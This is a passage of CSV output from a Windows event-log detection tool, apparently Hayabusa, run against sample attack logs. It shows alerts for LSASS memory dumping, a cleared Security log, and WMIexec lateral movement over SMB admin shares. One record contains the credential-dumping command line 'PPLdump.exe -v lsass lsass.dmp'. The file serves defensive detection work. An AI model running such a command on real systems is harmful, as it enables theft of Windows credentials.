10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v 
lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,CreateMiniDump Hacktool,,rules/sigma/file_event/file_event_hktl_createminidump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: 
admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.584 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 34114 : LogonID: 0x4da324f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 17:25:36.686 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3273,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.852 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da3292,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.913 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 57116 : LogonID: 0x4da32af,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.308 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator 
ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.313 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.325 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.329 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.332 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.335 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: 
\??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.338 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.342 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.344 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.348 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.350 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: 
admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.354 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.356 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.360 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.363 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.367 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.369 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.373 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.375 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.379 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB 
(GLOBAL).evtx" +2021-04-26 17:25:37.381 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.385 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.388 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.391 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 
10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.392 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.394 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:37.399 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.406 
+09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.409 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.418 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.420 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.441 +09:00,srvdefender01.offsec.lan,4674,low,Lateral Movement Indicator ConDrv,,rules/sigma/builtin/security/win_lateral_movement_condrv.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.450 +09:00,srvdefender01.offsec.lan,5140,informational,Network 
Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 
+09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 127.0.0.1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: __1619425227.894209 : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 